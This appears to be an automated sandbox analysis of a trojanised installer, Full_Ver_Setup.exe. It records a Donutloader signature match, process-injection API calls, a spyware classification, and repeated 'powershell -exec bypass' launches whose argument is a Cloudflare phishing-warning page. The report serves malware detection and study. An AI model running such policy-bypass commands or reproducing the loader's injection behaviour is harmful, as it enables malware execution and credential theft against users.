              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0324C989 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0324C989
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032003C90_2_032003C9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0324C9890_2_0324C989
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032223160_2_03222316
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032373160_2_03237316
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032173780_2_03217378
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321E3460_2_0321E346
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322F3A80_2_0322F3A8
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032352460_2_03235246
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321B2A60_2_0321B2A6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322C19F0_2_0322C19F
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322D2DF0_2_0322D2DF
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320A1260_2_0320A126
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323B1160_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032051160_2_03205116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323F1460_2_0323F146
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322C1A40_2_0322C1A4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320A1F60_2_0320A1F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320C0460_2_0320C046
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321A0560_2_0321A056
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032370B60_2_032370B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032070F60_2_032070F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321C7000_2_0321C700
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032047160_2_03204716
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032217460_2_03221746
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032307560_2_03230756
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032327560_2_03232756
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321275A0_2_0321275A
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323C7A30_2_0323C7A3
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321F7B60_2_0321F7B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323F7860_2_0323F786
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032386360_2_03238636
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321D6E60_2_0321D6E6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320A6D60_2_0320A6D6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032185260_2_03218526
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032155360_2_03215536
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032325060_2_03232506
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323F4260_2_0323F426
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032104130_2_03210413
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320E4870_2_0320E487
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03225BB60_2_03225BB6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03228B8D0_2_03228B8D
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03226A060_2_03226A06
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03205AC60_2_03205AC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322CADF0_2_0322CADF
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323696A0_2_0323696A
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323A9B60_2_0323A9B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032079E60_2_032079E6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320A9D60_2_0320A9D6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321D9D60_2_0321D9D6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_032378C60_2_032378C6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03225F260_2_03225F26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323CF300_2_0323CF30
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03235F610_2_03235F61
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03228F6C0_2_03228F6C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03209FA60_2_03209FA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321AFA60_2_0321AFA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03217F8D0_2_03217F8D
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323AE260_2_0323AE26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03207E760_2_03207E76
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03210E5D0_2_03210E5D
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323EED60_2_0323EED6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320ED0B0_2_0320ED0B
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0321DDE60_2_0321DDE6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0320ADC60_2_0320ADC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03211C730_2_03211C73
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03208C560_2_03208C56
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03237CA60_2_03237CA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0322ECB00_2_0322ECB0
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_0323CCE90_2_0323CCE9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: String function: 03209816 appears 76 times
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: String function: 03215526 appears 73 times
              Source: Full_Ver_Setup.exeStatic PE information: invalid certificate
              Source: Full_Ver_Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Full_Ver_Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: Full_Ver_Setup.exe, 00000000.00000000.1698059100.000000000053F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exe, 00000000.00000003.1824574336.000000000396D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Full_Ver_Setup.exe
              Source: Full_Ver_Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: Commandline size = 4588
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: Commandline size = 4588Jump to behavior
              Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@3/3
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 0_2_03200AD9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_03200AD9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fs5g2pay.usn.ps1Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Full_Ver_Setup.exe, 00000000.00000003.1900728110.0000000003F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Full_Ver_Setup.exeVirustotal: Detection: 12%
              Source: Full_Ver_Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Full_Ver_Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Full_Ver_Setup.exeString found in binary or memory: /LoadInf=
              Source: Full_Ver_Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile read: C:\Users\user\Desktop\Full_Ver_Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Full_Ver_Setup.exe "C:\Users\user\Desktop\Full_Ver_Setup.exe"
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Full_Ver_Setup.exeStatic file information: File size 74953137 > 1048576

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> 